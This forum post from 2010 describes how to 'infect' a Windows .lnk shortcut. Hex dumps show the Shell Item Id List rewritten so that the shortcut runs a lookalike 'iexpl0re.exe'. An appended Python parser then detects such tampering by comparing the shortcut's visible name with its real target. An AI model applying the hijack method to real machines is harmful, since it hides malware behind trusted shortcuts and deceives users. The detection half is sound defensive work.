EOF forum


#1 2010-01-27 17:07:15

nEINEI
Member
Registered: 2009-09-26
Posts: 27

simple method of infection .lnk file

.lnk file format

+---------------------------+
| lnk file header           |
+---------------------------+
| Shell Item Id List        |
+---------------------------+
| File location info        |
+---------------------------+
| Description string        |
+---------------------------+
| Relative path string      |
+---------------------------+
| Working directory string  |
+---------------------------+
| Command line string       |
+---------------------------+
| Icon filename string      |
+---------------------------+
| Extra stuff               |
+---------------------------+

.lnk points to a valid target file path only in the Shell Item Id List section, so modify it.

The Shell Item Id List records the target file path.

We have two ways to modify it so that it points to the new object file path.

1: directly modify the original path

For example, the original path is c:\11\22\33\4.exe;

the Shell Item Id List has a structure similar to the following:

   SHITEMID[0] -> fixed value
   SHITEMID[1] -> c:\???
   SHITEMID[2] -> ???11???
   SHITEMID[3] -> ???22???
   SHITEMID[4] -> ???33???
   SHITEMID[5] -> ???4.exe??? ---> revised to 5.exe

  Copy the new object file to c:\11\22\33\5.exe.
  In this way, path control is not flexible enough.

2: Fake path data

The .lnk file format's section data are based on relative offsets, so we replace the original data with fake path data;
this will not affect its running.

4.exe.lnk, Shell Item Id List section

Original data:

Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F

00000040                                        EF 00 14 00               ?..
00000050   1F 50 E0 4F D0 20 EA 3A  69 10 A2 D8 08 00 2B 30   .P郞??i.⒇..+0
00000060   30 9D 19 00 2F 43 3A 5C  00 00 00 00 00 00 00 00   0?./C:\........
00000070   00 00 00 00 00 00 00 00  00 00 00 2E 00 31 00 00   .............1..
00000080   00 00 00 3B 3C B1 73 10  00 31 31 00 00 1C 00 03   ...;<眘..11.....
00000090   00 04 00 EF BE 3B 3C B1  73 3B 3C B2 73 14 00 00   ...锞;<眘;<瞫...
000000A0   00 31 00 31 00 00 00 12  00 2E 00 31 00 00 00 00   .1.1.......1....
000000B0   00 3B 3C B1 73 10 00 32  32 00 00 1C 00 03 00 04   .;<眘..22.......
000000C0   00 EF BE 3B 3C B1 73 3B  3C B2 73 14 00 00 00 32   .锞;<眘;<瞫....2
000000D0   00 32 00 00 00 12 00 2E  00 31 00 00 00 00 00 3B   .2.......1.....;
000000E0   3C B4 73 10 00 33 33 00  00 1C 00 03 00 04 00 EF   <磗..33........?
000000F0   BE 3B 3C B1 73 3B 3C B5  73 14 00 00 00 33 00 33   ?<眘;<� ....3.3
00000100   00 00 00 12 00 36 00 32  00 00 00 00 00 3B 3C B4   .....6.2.....;<?
00000110   73 20 00 34 2E 65 78 65  00 22 00 03 00 04 00 EF   s .4.exe.".....?
00000120   BE 3B 3C B4 73 3B 3C B4  73 14 00 00 00 34 00 2E   ?<磗;<磗....4..
00000130   00 65 00 78 00 65 00 00  00 14 00                  .e.x.e.....

Target file path: c:\Program Files\Internet Explorer\iexpl0re.exe
Fake new data:

Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F

00000040                                        17 01 14 00               ....
00000050   1F 50 E0 4F D0 20 EA 3A  69 10 A2 D8 08 00 2B 30   .P郞??i.⒇..+0
00000060   30 9D 19 00 2F 43 3A 5C  00 00 00 00 00 00 00 00   0?./C:\........
00000070   00 00 00 00 00 00 00 00  00 00 00 4A 00 31 00 00   ...........J.1..
00000080   00 00 00 31 3C DA 71 11  00 50 52 4F 47 52 41 7E   ...1<趒..PROGRA~
00000090   31 00 00 32 00 03 00 04  00 EF BE 57 3B 8C 41 3B   1..2.....锞W;孉;
000000A0   3C B4 73 14 00 00 00 50  00 72 00 6F 00 67 00 72   <磗....P.r.o.g.r
000000B0   00 61 00 6D 00 20 00 46  00 69 00 6C 00 65 00 73   .a.m. .F.i.l.e.s
000000C0   00 00 00 18 00 52 00 31  00 00 00 00 00 8E 3B 86   .....R.1.....??
000000D0   10 10 00 49 4E 54 45 52  4E 7E 31 00 00 3A 00 03   ...INTERN~1..:..
000000E0   00 04 00 EF BE 57 3B AD  42 3B 3C 95 71 14 00 00   ...锞W;瑽;<晀...
000000F0   00 49 00 6E 00 74 00 65  00 72 00 6E 00 65 00 74   .I.n.t.e.r.n.e.t
00000100   00 20 00 45 00 78 00 70  00 6C 00 6F 00 72 00 65   . .E.x.p.l.o.r.e
00000110   00 72 00 00 00 18 00 4C  00 32 00 00 6C 01 00 1C   .r.....L.2..l...
00000120   3B D0 50 20 00 69 65 78  70 6C 30 72 65 2E 65 78   ;� � .iexpl0re.ex
00000130   65 00 00 30 00 03 00 04  00 EF BE 3B 3C 24 77 3B   e..0.....锞;<$w;
00000140   3C 24 77 14 00 00 00 69  00 65 00 78 00 70 00 6C   <$w....i.e.x.p.l
00000150   00 30 00 72 00 65 00 2E  00 65 00 78 00 65 00 00   .0.r.e...e.x.e..
00000160   00 1C 00                                           ...
 

You can replace it.
4.exe.lnk -> ShellExecute iexpl0re.exe.

Forgive me for my poor English O:)

Last edited by nEINEI (2010-01-27 17:08:00)


i like this

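The post shows how the Shell Item Id List (the LinkTargetIDList in Microsoft's MS-SHLLINK terminology) alone decides what a shortcut launches, so a defender's first question about a suspicious .lnk is "what does this list actually resolve to?". The following Python is an added example, not code from the post or its author: it walks the list item by item (root folder, volume, directory and file entries, with the 0xBEEF0004 extension block that carries the long name), rebuilds the target path, and compares it with the name the user sees. The only page data it uses are the two hex dumps above, embedded as constructed byte strings; the 76-byte ShellLinkHeader in front of them is constructed from the documented header layout, the 2-byte terminal ID (which the dumps stop just before) is appended, and everything after the IDList is left out. The version-to-offset table for the extension block is an assumption taken from public shell-item documentation; the dumps themselves only use version 3.

```python
import struct

LNK_HEADER_SIZE = 0x4C
HAS_LINK_TARGET_ID_LIST = 0x01        # LinkFlags bit 0
EXT_SIGNATURE = b"\x04\x00\xEF\xBE"   # 0xBEEF0004 extension block, little-endian
# UTF-16LE long-name offset inside a 0xBEEF0004 block, by block version (assumed from public
# shell-item documentation; the post's dumps only use version 3).
LONG_NAME_OFFSET = {3: 20, 7: 38, 8: 42, 9: 46}


def _cstring(buf: bytes, start: int, utf16: bool = False) -> str:
    # NUL-terminated string at `start`: ANSI by default, UTF-16LE when utf16=True
    if utf16:
        end = start
        while end + 1 < len(buf) and buf[end:end + 2] != b"\x00\x00":
            end += 2
        return buf[start:end].decode("utf-16-le")
    return buf[start:buf.index(b"\x00", start)].decode("ascii", errors="replace")


def _split_id_list(data: bytes) -> list:
    # Walk the size-prefixed ItemIDs; each body is returned without its size word
    items, pos = [], 0
    while True:
        if pos + 2 > len(data):
            raise ValueError("IDList has no TerminalID")
        size = struct.unpack_from("<H", data, pos)[0]
        if size == 0:                          # TerminalID ends the list
            return items
        if size < 2 or pos + size > len(data):
            raise ValueError(f"bad ItemID size {size} at IDList offset {pos}")
        items.append(data[pos + 2:pos + size])
        pos += size


def _item_name(body: bytes):
    # Path component contributed by one item, or None for items that add none
    kind = body[0]
    if kind == 0x2F:                           # volume item: ANSI "C:\" after the type byte
        return _cstring(body, 1)
    if (kind & 0x70) == 0x30:                  # file (0x32) or directory (0x31) entry
        short_name = _cstring(body, 12)        # 8.3 name follows size/date/attribute fields
        sig = body.find(EXT_SIGNATURE, 12)
        if sig == -1:
            return short_name                  # no extension block: only the 8.3 name exists
        version = struct.unpack_from("<H", body, sig - 2)[0]  # block = size(2) version(2) sig(4) ...
        offset = LONG_NAME_OFFSET.get(version)
        return short_name if offset is None else _cstring(body, sig - 4 + offset, utf16=True)
    return None                                # root folder (0x1F) and unrecognised items


def target_path(lnk: bytes) -> str:
    # Rebuild the path the shell resolves from the LinkTargetIDList
    if len(lnk) < LNK_HEADER_SIZE or struct.unpack_from("<I", lnk, 0)[0] != LNK_HEADER_SIZE:
        raise ValueError("not a shell link: bad HeaderSize")
    if not struct.unpack_from("<I", lnk, 0x14)[0] & HAS_LINK_TARGET_ID_LIST:
        raise ValueError("shortcut carries no LinkTargetIDList")
    list_size = struct.unpack_from("<H", lnk, LNK_HEADER_SIZE)[0]
    start = LNK_HEADER_SIZE + 2
    parts = [n for n in map(_item_name, _split_id_list(lnk[start:start + list_size])) if n]
    return "\\".join([parts[0].rstrip("\\")] + parts[1:]) if parts else ""


def check_shortcut(lnk_filename: str, lnk: bytes) -> dict:
    # Defender's check: does the name the user sees match the file that will actually run?
    target = target_path(lnk)
    shown = lnk_filename[:-4] if lnk_filename.lower().endswith(".lnk") else lnk_filename
    real = target.rsplit("\\", 1)[-1]
    return {"target": target, "name_matches_target": shown.lower() == real.lower()}


def _header() -> bytes:
    # Constructed 76-byte ShellLinkHeader: HeaderSize, LinkCLSID, LinkFlags=HasLinkTargetIDList
    clsid = bytes.fromhex("01140200000000" + "00C000000000000046")   # {00021401-0000-0000-C000-000000000046}
    head = struct.pack("<I", LNK_HEADER_SIZE) + clsid + struct.pack("<I", HAS_LINK_TARGET_ID_LIST)
    return head.ljust(LNK_HEADER_SIZE, b"\x00")


# IDList bytes copied from the post's two dumps (file offset 0x4C onward) plus the 2-byte
# TerminalID the dumps stop just before; everything after the IDList is left out.
ORIGINAL_LNK = _header() + bytes.fromhex("".join("""
EF 00 14 00 1F 50 E0 4F D0 20 EA 3A 69 10 A2 D8 08 00 2B 30 30 9D 19 00 2F 43 3A 5C 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2E 00 31 00 00 00 00 00 3B 3C B1 73 10 00 31 31 00
00 1C 00 03 00 04 00 EF BE 3B 3C B1 73 3B 3C B2 73 14 00 00 00 31 00 31 00 00 00 12 00 2E 00 31
00 00 00 00 00 3B 3C B1 73 10 00 32 32 00 00 1C 00 03 00 04 00 EF BE 3B 3C B1 73 3B 3C B2 73 14
00 00 00 32 00 32 00 00 00 12 00 2E 00 31 00 00 00 00 00 3B 3C B4 73 10 00 33 33 00 00 1C 00 03
00 04 00 EF BE 3B 3C B1 73 3B 3C B5 73 14 00 00 00 33 00 33 00 00 00 12 00 36 00 32 00 00 00 00
00 3B 3C B4 73 20 00 34 2E 65 78 65 00 22 00 03 00 04 00 EF BE 3B 3C B4 73 3B 3C B4 73 14 00 00
00 34 00 2E 00 65 00 78 00 65 00 00 00 14 00 00 00
""".split()))
TAMPERED_LNK = _header() + bytes.fromhex("".join("""
17 01 14 00 1F 50 E0 4F D0 20 EA 3A 69 10 A2 D8 08 00 2B 30 30 9D 19 00 2F 43 3A 5C 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4A 00 31 00 00 00 00 00 31 3C DA 71 11 00 50 52 4F
47 52 41 7E 31 00 00 32 00 03 00 04 00 EF BE 57 3B 8C 41 3B 3C B4 73 14 00 00 00 50 00 72 00 6F
00 67 00 72 00 61 00 6D 00 20 00 46 00 69 00 6C 00 65 00 73 00 00 00 18 00 52 00 31 00 00 00 00
00 8E 3B 86 10 10 00 49 4E 54 45 52 4E 7E 31 00 00 3A 00 03 00 04 00 EF BE 57 3B AD 42 3B 3C 95
71 14 00 00 00 49 00 6E 00 74 00 65 00 72 00 6E 00 65 00 74 00 20 00 45 00 78 00 70 00 6C 00 6F
00 72 00 65 00 72 00 00 00 18 00 4C 00 32 00 00 6C 01 00 1C 3B D0 50 20 00 69 65 78 70 6C 30 72
65 2E 65 78 65 00 00 30 00 03 00 04 00 EF BE 3B 3C 24 77 3B 3C 24 77 14 00 00 00 69 00 65 00 78
00 70 00 6C 00 30 00 72 00 65 00 2E 00 65 00 78 00 65 00 00 00 1C 00 00 00
""".split()))
```

Run against the post's original dump, target_path returns C:\11\22\33\4.exe; against the faked dump it returns C:\Program Files\Internet Explorer\iexpl0re.exe, and check_shortcut("4.exe.lnk", TAMPERED_LNK) reports the mismatch between the visible name and the real target. In practice you would feed the bytes of every *.lnk under a user's Desktop, Start Menu and Startup folders through check_shortcut and alert on a name mismatch or on a target outside the directories you expect; the one-character difference between iexplore.exe and iexpl0re.exe is invisible in Explorer but exactly what the rebuilt path exposes.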

 